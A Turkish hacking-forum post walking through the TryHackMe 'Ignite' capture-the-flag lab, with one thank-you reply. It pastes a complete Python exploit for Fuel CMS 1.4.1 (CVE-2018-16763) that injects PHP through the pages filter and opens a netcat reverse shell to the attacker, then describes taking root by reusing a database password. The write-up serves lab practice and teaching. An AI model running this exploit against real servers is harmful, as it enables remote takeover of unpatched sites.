TryHackMe | Ignite

Will Graham

Katılımcı Üye
14 Eki 2022
581
489
merhaba, bu konumda tryhackme.com platformu üzerinde ki ignite isimli ctf'nin çözümünü göstereceğim. makineyi yapan kişi sorunun web sunucusunda olduğunu söylediği için web sunucusuna bakarak başlıyoruz.

s7owlgs.png


uygulamayı açtığımızda; fuel cms isimli bir içerik yönetim sistemini kullandığını, veri tabanı bilgilerinin bulunduğu dosyanın yolunu ve yönetim paneline ait kullanıcı adı ve şifre buluyoruz. panelden shell atılamayacağını bildiğimden içerik yönetim sisteminde bir güvenlik açığı olup olmadığını öğrenmek için google üzerinde arama yapıyorum.

Python:
# Exploit Title: fuel CMS 1.4.1 - Remote Code Execution (1) Updated
# Date 2021-08-16
# Exploit Author: jtaubs1 (ice-wzl)
# Vendor Homepage: https://www.getfuelcms.com/
# Software Link: https://github.com/daylightstudio/FUEL-CMS/releases/tag/1.4.1
# Version: <= 1.4.1
# Tested on: Ubuntu - Apache2 - php5
# CVE : CVE-2018-16763

# Update included: Works with python3
    # Removed burp proxy code to allow it to run as a stand alone RCE exploit.
    # Takes sys.args
    # Spawns a Reverse shell

#!/usr/bin/python3
import requests
import urllib.parse
import sys


url = sys.argv[1]
ip = sys.argv[2]
port = sys.argv[3]

command = "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|sh -i 2>&1| nc "
command += ip
command += " "
command += port
command += ">/tmp/f"

payload = url + "/fuel/pages/select/?filter=%27%2b%70%69%28%70%72%69%6e%74%28%24%61%3d%27%73%79%73%74%65%6d%27%29%29%2b%24%61%28%27"+urllib.parse.quote(command)+"%27%29%2b%27"
r = requests.get(payload)
print(r)
Link: github.com/ice-wzl/Fuel-1.4.1-RCE-Updated/blob/main/Fuel-Updated.py

bulduğumuz exploiti bir dosya'ya kayıt ettikten sonra bir portu dinleyelim ve
python3 exploit.py url lhost lport şeklinde exploiti çalıştıralım.

pmmub90.png


bağlantı geldikten sonra /home/www-data dizini altında ilk bayrağımızı alıyoruz.

f6eh0jo.png


şimdi 2.bayrağı alabilmek için root yetkisine geçmeliyiz. hatırlarsanız biraz önce veri tabanının yolunu öğrenmiştik, burada ki şifreyi root kullanıcısına girmek için kullandığımızda, kullanıcıya giriş yapabildik ve bayrağı aldık.

berubby.png


makine linki: tryhackme.com/room/ignite
 

Rebelkan

Blue Team Lider Yrd.
12 Şub 2019
1,847
923
Easy, measy ama yine de CTF, yani güzel. Eline sağlık, teşekkürler.
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.